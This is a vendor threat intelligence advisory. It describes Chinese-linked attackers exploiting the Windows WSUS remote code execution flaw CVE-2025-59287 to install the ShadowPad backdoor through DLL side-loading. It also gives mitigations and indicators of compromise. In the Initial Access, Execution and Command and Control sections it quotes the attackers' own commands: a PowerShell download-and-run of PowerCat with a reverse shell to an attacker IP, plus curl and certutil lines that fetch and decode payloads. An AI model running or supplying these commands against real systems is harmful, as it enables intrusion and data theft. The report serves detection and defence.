【CyCraft Monthly Intelligence】Microsoft WSUS Vulnerability Exploited by Chinese Threat Actors with ShadowPad

Threat and Impact

Following Microsoft's vulnerability disclosure on October 14, 2025, and the public release of a Proof of Concept (PoC) on October 22, attackers rapidly weaponized CVE-2025-59287, a critical Remote Code Execution (RCE) vulnerability in Windows Server Update Services (WSUS). Multiple sources have observed attacks targeting WSUS-enabled servers to deploy the ShadowPad backdoor. Attackers leverage PowerCat to obtain a system-level shell and utilize native system tools (curl and certutil) to deploy and install ShadowPad via DLL side-loading.

Analyst Perspective

The key warning from this incident is the extremely short break between the public PoC release and actual exploitation. Attackers are abusing common tools such as PowerShell, certutil.exe, and curl.exe to minimize reliance on known malware, thereby increasing the difficulty of signature-based detection. ShadowPad executes primarily in memory via DLL side-loading, injects itself into common Windows processes, and maintains persistence through Run keys and scheduled tasks to evade detection and ensure long-term access. All Windows servers running WSUS—particularly those exposed to the Internet on TCP 8530/8531 or with weak access controls—will be the main targets.

Incident Description

ShadowPad is a privately sold backdoor, commonly associated with China-nexus APT groups. It establishes a covert and persistent access channel, utilizing HTTP/HTTPS via port 443 with browser-mimicking headers to obfuscate legitimate traffic. WSUS serves as core enterprise infrastructure; by exploiting the RCE vulnerability to remotely acquire system-level privileges on WSUS, hackers can establish an initial foothold to control the entire environment and move laterally.

Technical Details

Reconnaissance

Attackers scan for WSUS servers accessible via TCP 8530/8531, identifying targets vulnerable to CVE-2025-59287 (WSUS RCE).

Initial Access

By exploiting CVE-2025-59287 to execute commands with SYSTEM privileges, attackers immediately use PowerShell to download and execute PowerCat, obtaining an interactive CMD shell.

powershell.exe-c IEX (New-Object System.Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’)
;powercat -c 154.17.26[.]41 -p 8080 -e cmd

Execution

Upon gaining initial access, attackers execute legitimate Windows utilities (curl.exe and certutil.exe) to install the ShadowPad malware.

curlhxxp://149.28.78[.]189:42306/tmp.txt -o C:\users\%ASD%\tmp.txt & curlhxxp://149.28.78[.]189:42306/dll.txt -o C:\users\%ASD%\dll.txt & curlhxxp://149.28.78[.]189:42306/exe.txt -o C:\users\%ASD%\exe.txt certutil-decode C:\users\%ASD%\tmp.txt C:\programdata\0C137A80.tmp

DLL Side-Loading Activating ShadowPad:

  • Utilize Legitimate EXE: ETDCtrlHelper.exe(MD5: 564e7d39a9b6da3cf0da3373351ac717)
  • Load Malicious DLL: ETDApix.dll(MD5: 27e00b5594530e8c5e004098eef2ec50)
  • Utilize Static Configuration: 0C137A80.tmp(MD5: 85b935e80e84dd47e0fa5e1dfb2c16f4)

By mixing the legitimate EXE and the malicious DLL, the trusted executable loads the malicious DLL, which subsequently decrypts or loads the ShadowPad core. This process occurs entirely in memory.

Persistence

  • Persistence Registry Key:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • Value: “Q‑X64”
  • Scheduled Task: Under the Microsoft\Windows\UPnP path and with the name “Microsoft Corporation.”
  • Startup Locations:
    • %ProgramFiles%\Q‑X64\Q‑X64.exe
    • %APPDATA%\Q‑X64\Q‑X64.exe
    • %LOCALAPPDATA%\Q‑X64\Q‑X64.exe
    • %TEMP%\Q‑X64\Q‑X64.exe

DefenseEvasion

  • Living off the Land (LotL) technique: Utilize built-in tools like PowerShell (downloaded to run PowerCat), curl.exe, and certutil.exe (to decode payloads), minimizing reliance on the customized malware
  • DLL side-loading: Exploit the trusted ETDCtrlHelper.exe to load ETDApix.dll and conceal the execution process to evade signature-based monitoring.
  • Memory execution: The loader operates entirely in memory, only using 0C137A80.tmp as a temporary disk artifact, reducing the footprint of obvious PE files.
  • Masquerading and benign naming: Payloads are staged as .tmp files. Persistence mechanisms use names that mimic official Microsoft format, such as "Microsoft Corporation" tasks or "Q-X64" services.
  • Network obfuscation: C2 traffic uses HTTP POST over port 443, mimicking legitimate browser headers (Firefox 87 UA, Accept-Language, gzip/deflate) to evade anomaly detection.

Commandand Control

  • Stage 1:
    Gain control via PowerCat (Reverse Shell).
    powercat -c 154.17.26[.]41 -p 8080 -e cmd
  • Stage 2:
    ShadowPad C2 callback and command.
    Endpoint: http://163.61.102.245:443/
    Protocol: HTTP/HTTPS POST
    Headers: Mimicking Firefox:
    User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
    Accept-Language:en-ca,en;q=0.8,en-us;q=0.6,de-de;q=0.4,de;q=0.2
    Accept-Encoding:gzip, deflate
    Accept:text/html, application/xhtml+xml, image/jxr, /

Exfiltration

Data is exfiltrated via the C2 channel at 163.61.102[.]245:443.

Mitigation

Remove the WSUS RCE attack vector

Apply Microsoft's security updates for CVE-2025-59287 to all WSUS servers immediately. A reboot is required to complete mitigation and remove the RCE vector exploited in this campaign. If patching must be delayed, temporarily disable the WSUS server role or block TCP ports 8530/8531 at the host/perimeter firewall.

Manage WSUS exposure

Secure WSUS from direct Internet exposure by placing it behind a firewall. Restrict access to necessary subnets and administrators only. Limit outbound connections solely to Microsoft Update endpoints and block unnecessary inbound traffic on ports 8530/8531. Enforce 8531 HTTPS communication and disable 8530 HTTP connection.

Harden WSUS host configuration
Implement least-privilege ACLs to prevent unauthorized writing to Program Files, ProgramData, AppData, and Temp. Enforce AppLocker/WDAC allowing-list to run only approved and signed binaries, blocking unauthorized DLL side-loading paths. Reduce the side-loading attack surface by maintaining SafeDllSearchMode and removing redundant software.

Detect and block malicious infrastructure

Enterprises should proactively monitor and block malicious infrastructure related to this incident, including IPs, URLs, and sample hashes. For details, please refer to the IOC section.

 

Reference

IoCs (Indicator of Compromise)
   
Name   
   
MD5    
   
Sha-1   
   
Sha-256   
   
ETDApix.dll   
   
27e00b559453
   0e8c5e004098
   eef2ec50   
   
2e67487ec64
   6ec056bc549
   76da5e68e395034d7b   
   
d429934b06d
   e67c156dc559
   b33c34db5e02
   bc56ac2c1
   cd45ee03e6a21cf003af   
   
0C137A80.tmp   
   
85b935e80e84
   dd47e0fa5e1dfb2c16f4   
   
   
   
   

IP

  • 154.17.26.41:8080
  • 149.28.78.189:42306

URL

HTTP://163.61.102[.]245:443

Malicious File Paths

  • %ProgramFiles%\Q-X64\Q-X64.exe
  • %APPDATA%\Q-X64\Q-X64.exe
  • %LOCALAPPDATA%\Q-X64\Q-X64.exe
  • %TEMP%\Q-X64\Q-X64.exe

Commands with Q-X64 Parameters

  • “%PROGRAMFILES%\WindowsMail\WinMail.exe” Q-X64
  • “%PROGRAMFILES%\WindowsMedia Player\wmpnetwk.exe” Q-X64
  • “%ProgramFiles%\WindowsMedia Player\wmplayer.exe” Q-X64
  • “%SystemRoot%\system32\svchost.exe”Q-X64

About CyCraft

CyCraft is a cybersecurity company founded in 2017, focusing on autonomous AI technology. Headquartered in Taiwan, it has subsidiaries in Japan and Singapore. CyCraft provides professional cybersecurity services to government agencies, police and defense forces, banks, and high-tech manufacturers throughout the Asia-Pacific region. It has received strong backing from the CID Group and Pavilion Capital, a Temasek Holdings Private Limited subsidiary.

Subscribe to CyCraft's Newsletter

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
By clicking this button, you agree to CyCraft's privacy policy and consent to CyCraft using the information you provided to contact you. You may cancel your subscription at any time.